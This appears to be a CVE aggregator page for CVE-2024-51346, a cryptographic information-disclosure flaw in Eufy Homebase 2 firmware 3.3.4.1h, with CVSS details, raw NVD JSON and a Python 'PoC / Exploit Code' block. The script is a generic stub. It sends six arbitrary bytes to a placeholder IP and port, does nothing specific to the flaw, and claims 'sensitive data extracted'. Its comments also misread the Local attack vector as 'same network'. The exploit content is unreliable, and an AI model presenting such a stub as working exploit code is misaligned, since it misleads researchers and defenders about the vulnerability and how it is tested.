Security Vulnerability Report
中文
CVE-2024-51346 CVSS 7.7 HIGH

CVE-2024-51346

Published: 2026-03-25 14:16:29
Last Modified: 2026-03-25 15:41:34

Description

An issue in Eufy Homebase 2 version 3.3.4.1h allows a local attacker to obtain sensitive information via the cryptographic scheme.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Eufy Homebase 2 3.3.4.1h

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import binascii # Proof of Concept for CVE-2024-51346 # This script demonstrates the potential to extract sensitive info # due to weak cryptographic implementation on Eufy Homebase 2. # Note: Actual exploitation requires specific target IP and analysis. def exploit_cve_2024_51346(target_ip, target_port): print(f"[*] Targeting {target_ip}:{target_port}") try: # 1. Establish a connection to the local service # Attacker needs to be on the same network (AV:L) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # 2. Send a crafted packet to trigger the weak crypto response # The payload structure depends on the specific protocol reversing payload = b"\x00\x01\x02\x03\x04\x05" sock.send(payload) # 3. Receive response that might contain sensitive memory or data response = sock.recv(4096) if response: print("[+] Response received:") print(binascii.hexlify(response)) print("[!] Potential sensitive data extracted due to crypto flaw.") else: print("[-] No response received.") sock.close() except Exception as e: print(f"[-] Error during exploitation: {e}") if __name__ == "__main__": # Replace with actual device IP TARGET_IP = "192.168.1.100" TARGET_PORT = 8888 exploit_cve_2024_51346(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-51346", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:28.967", "lastModified": "2026-03-25T15:41:33.977", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Eufy Homebase 2 version 3.3.4.1h allows a local attacker to obtain sensitive information via the cryptographic scheme."}, {"lang": "es", "value": "Un problema en Eufy Homebase 2 versión 3.3.4.1h permite a un atacante local obtener información sensible a través del esquema criptográfico."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-330"}]}], "references": [{"url": "https://github.com/victorGoeman/Eufy-Ecosystem-Security-Research/blob/main/CVE-2024-51346.md", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/Eufy-Ecosystem-Security-Research/blob/main/README.md", "source": "[email protected]"}, {"url": "https://www.eufy.com/", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/Eufy-Ecosystem-Security-Research/blob/main/CVE-2024-51346.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}